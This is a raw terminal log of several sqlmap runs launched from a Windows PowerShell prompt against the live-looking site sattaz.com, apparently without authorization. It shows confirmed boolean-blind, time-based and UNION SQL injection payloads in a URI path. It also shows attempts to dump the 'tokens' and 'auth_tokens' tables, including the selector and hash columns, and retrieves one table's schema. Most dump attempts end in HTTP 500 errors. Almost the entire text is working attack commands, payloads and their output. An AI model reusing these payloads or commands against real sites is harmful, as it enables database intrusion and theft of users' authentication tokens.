      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:54:47 /2025-09-29/

[18:54:47] [DEBUG] cleaning up configuration parameters
[18:54:47] [DEBUG] setting the HTTP timeout
[18:54:47] [DEBUG] setting the HTTP User-Agent header
[18:54:47] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:54:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:54:47] [DEBUG] creating HTTP requests opener object
[18:54:47] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:54:47] [DEBUG] used the default behavior, running in batch mode
[18:54:47] [INFO] resuming back-end DBMS 'mysql'
[18:54:47] [DEBUG] resolving hostname 'sattaz.com'
[18:54:47] [INFO] testing connection to the target URL
[18:54:49] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[18:54:50] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[18:54:50] [INFO] fetching columns for table 'tokens' in database 'sattaz'
[18:54:50] [DEBUG] resuming configuration option 'code' (200)
[18:54:50] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(column_name AS NCHAR),0x20),IFNULL(CAST(column_type AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x746f6b656e73 AND table_schema=0x73617474617a-- -
[18:54:53] [WARNING] reflective value(s) found and filtering out
[18:54:53] [DEBUG] performed 1 query in 3.74 seconds
Database: sattaz
Table: tokens
[4 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| id     | int          |
| sent   | int          |
| token  | varchar(164) |
| uid    | int          |
+--------+--------------+

[18:54:53] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 18:54:53 /2025-09-29/

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ -D sattaz -T auth_tokens \ -C "id,uid,expires" \ --dump --where="id <= 50" \ --threads=1 --delay=1 -v 3
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9.4#dev}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:55:35 /2025-09-29/

[18:55:35] [DEBUG] cleaning up configuration parameters
[18:55:35] [DEBUG] setting the HTTP timeout
[18:55:35] [DEBUG] setting the HTTP User-Agent header
[18:55:35] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:55:35] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.93 Safari/537.36' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:55:35] [DEBUG] creating HTTP requests opener object
[18:55:35] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:55:35] [DEBUG] used the default behavior, running in batch mode
[18:55:35] [INFO] resuming back-end DBMS 'mysql'
[18:55:35] [DEBUG] resolving hostname 'sattaz.com'
[18:55:35] [INFO] testing connection to the target URL
[18:55:37] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[18:55:38] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[18:55:38] [INFO] fetching entries of column(s) 'expires,id,uid' for table 'auth_tokens' in database 'sattaz'
[18:55:38] [DEBUG] resuming configuration option 'code' (200)
[18:55:38] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[18:55:38] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(expires AS NCHAR),0x20),IFNULL(CAST(id AS NCHAR),0x20),IFNULL(CAST(uid AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id <= 50-- -
[18:55:39] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:39] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(expires AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(id AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS NCHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id <= 50-- -
[18:55:41] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:41] [DEBUG] turning off NATIONAL CHARACTER casting
[18:55:41] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(expires AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(id AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id <= 50-- -
[18:55:42] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:43] [DEBUG] performed 3 queries in 4.81 seconds
[18:55:43] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[18:55:43] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(expires AS CHAR),0x20),IFNULL(CAST(id AS CHAR),0x20),IFNULL(CAST(uid AS CHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id <= 50-- -
[18:55:44] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:44] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id <= 50-- -
[18:55:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:46] [WARNING] the SQL query provided does not return any output
[18:55:46] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:55:46] [INFO] fetching number of column(s) 'expires,id,uid' entries for table 'auth_tokens' in database 'sattaz'
[18:55:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:55:46] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>51 AND 'bLDh'='bLDh
[18:55:47] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:47] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[18:55:47] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>48 AND 'bLDh'='bLDh
[18:55:49] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:49] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>9 AND 'bLDh'='bLDh
[18:55:51] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:51] [INFO] retrieved:
[18:55:51] [DEBUG] performed 3 queries in 4.88 seconds
[18:55:51] [PAYLOAD] kalyan' AND (SELECT 7535 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>51,0,5)))))UaLq) AND 'BJTA'='BJTA
                                                                            [18:55:51] [WARNING] time-based comparison requires larger statistical model, please wait...................... (done)
[18:56:27] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:56:27] [PAYLOAD] kalyan' AND (SELECT 7535 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>48,0,5)))))UaLq) AND 'BJTA'='BJTA
[18:56:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[18:56:29] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:56:29] [PAYLOAD] kalyan' AND (SELECT 7535 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>9,0,5)))))UaLq) AND 'BJTA'='BJTA
[18:56:30] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:56:30] [INFO] retrieved:
[18:56:30] [DEBUG] performed 3 queries in 39.53 seconds
[18:56:30] [WARNING] unable to retrieve the number of column(s) 'expires,id,uid' entries for table 'auth_tokens' in database 'sattaz'
[18:56:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times
[18:56:30] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 18:56:30 /2025-09-29/

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ -D sattaz -T tokens \ -C "id,uid,sent" \ --dump --where="id<=200" \ --threads=1 --delay=1 -v 3
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9.4#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:57:37 /2025-09-29/

[18:57:37] [DEBUG] cleaning up configuration parameters
[18:57:38] [DEBUG] setting the HTTP timeout
[18:57:38] [DEBUG] setting the HTTP User-Agent header
[18:57:38] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:57:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:57:38] [DEBUG] creating HTTP requests opener object
[18:57:38] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:57:38] [DEBUG] used the default behavior, running in batch mode
[18:57:38] [INFO] resuming back-end DBMS 'mysql'
[18:57:38] [DEBUG] resolving hostname 'sattaz.com'
[18:57:38] [INFO] testing connection to the target URL
[18:57:40] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[18:57:40] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[18:57:40] [INFO] fetching entries of column(s) 'id,sent,uid' for table 'tokens' in database 'sattaz'
[18:57:40] [DEBUG] resuming configuration option 'code' (200)
[18:57:40] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[18:57:40] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(id AS NCHAR),0x20),IFNULL(CAST(sent AS NCHAR),0x20),IFNULL(CAST(uid AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=200-- -
[18:57:42] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:42] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(id AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(sent AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS NCHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=200-- -
[18:57:44] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:44] [DEBUG] turning off NATIONAL CHARACTER casting
[18:57:44] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(id AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(sent AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=200-- -
[18:57:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:46] [DEBUG] performed 3 queries in 5.63 seconds
[18:57:46] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[18:57:46] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(id AS CHAR),0x20),IFNULL(CAST(sent AS CHAR),0x20),IFNULL(CAST(uid AS CHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=200-- -
[18:57:47] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:48] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=200-- -
[18:57:49] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:49] [WARNING] the SQL query provided does not return any output
[18:57:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:57:49] [INFO] fetching number of column(s) 'id,sent,uid' entries for table 'tokens' in database 'sattaz'
[18:57:49] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:57:49] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>51 AND 'offJ'='offJ
[18:57:51] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:51] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[18:57:51] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>48 AND 'offJ'='offJ
[18:57:52] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:52] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>9 AND 'offJ'='offJ
[18:57:54] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:57:54] [INFO] retrieved:
[18:57:54] [DEBUG] performed 3 queries in 4.85 seconds
[18:57:54] [PAYLOAD] kalyan' AND (SELECT 6218 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>51,0,5)))))dUMp) AND 'jGfE'='jGfE
                                                                            [18:57:54] [WARNING] time-based comparison requires larger statistical model, please wait...................... (done)
[18:58:31] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:58:31] [PAYLOAD] kalyan' AND (SELECT 6218 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>48,0,5)))))dUMp) AND 'jGfE'='jGfE
[18:58:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[18:58:32] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:58:32] [PAYLOAD] kalyan' AND (SELECT 6218 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=200),1,1))>9,0,5)))))dUMp) AND 'jGfE'='jGfE
[18:58:34] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:58:34] [INFO] retrieved:
[18:58:34] [DEBUG] performed 3 queries in 39.63 seconds
[18:58:34] [WARNING] unable to retrieve the number of column(s) 'id,sent,uid' entries for table 'tokens' in database 'sattaz'
[18:58:34] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times
[18:58:34] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 18:58:34 /2025-09-29/

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ -D sattaz -T auth_tokens \ -C "id,uid,selector,hash,expires" \ --dump --where="id<=50" \ --threads=1 --delay=1 -v 3
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.9.4#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:59:54 /2025-09-29/

[18:59:54] [DEBUG] cleaning up configuration parameters
[18:59:54] [DEBUG] setting the HTTP timeout
[18:59:54] [DEBUG] setting the HTTP User-Agent header
[18:59:54] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:59:54] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:59:54] [DEBUG] creating HTTP requests opener object
[18:59:54] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:59:54] [DEBUG] used the default behavior, running in batch mode
[18:59:54] [INFO] resuming back-end DBMS 'mysql'
[18:59:54] [DEBUG] resolving hostname 'sattaz.com'
[18:59:54] [INFO] testing connection to the target URL
[18:59:56] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[18:59:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[18:59:56] [INFO] fetching entries of column(s) '`hash`,expires,id,selector,uid' for table 'auth_tokens' in database 'sattaz'
[18:59:56] [DEBUG] resuming configuration option 'code' (200)
[18:59:56] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[18:59:56] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(`hash` AS NCHAR),0x20),IFNULL(CAST(expires AS NCHAR),0x20),IFNULL(CAST(id AS NCHAR),0x20),IFNULL(CAST(selector AS NCHAR),0x20),IFNULL(CAST(uid AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id<=50-- -
[18:59:58] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:59:58] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(`hash` AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(expires AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(id AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(selector AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS NCHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id<=50-- -
[19:00:00] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:00] [DEBUG] turning off NATIONAL CHARACTER casting
[19:00:00] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(`hash` AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(expires AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(id AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(selector AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id<=50-- -
[19:00:01] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:01] [DEBUG] performed 3 queries in 4.88 seconds
[19:00:01] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[19:00:01] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(`hash` AS CHAR),0x20),IFNULL(CAST(expires AS CHAR),0x20),IFNULL(CAST(id AS CHAR),0x20),IFNULL(CAST(selector AS CHAR),0x20),IFNULL(CAST(uid AS CHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id<=50-- -
[19:00:03] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:03] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id<=50-- -
[19:00:04] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:05] [WARNING] the SQL query provided does not return any output
[19:00:05] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:00:05] [INFO] fetching number of column(s) '`hash`,expires,id,selector,uid' entries for table 'auth_tokens' in database 'sattaz'
[19:00:05] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:00:05] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>51 AND 'qmgM'='qmgM
[19:00:06] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:06] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[19:00:06] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>48 AND 'qmgM'='qmgM
[19:00:08] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:08] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>9 AND 'qmgM'='qmgM
[19:00:09] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:09] [INFO] retrieved:
[19:00:09] [DEBUG] performed 3 queries in 4.82 seconds
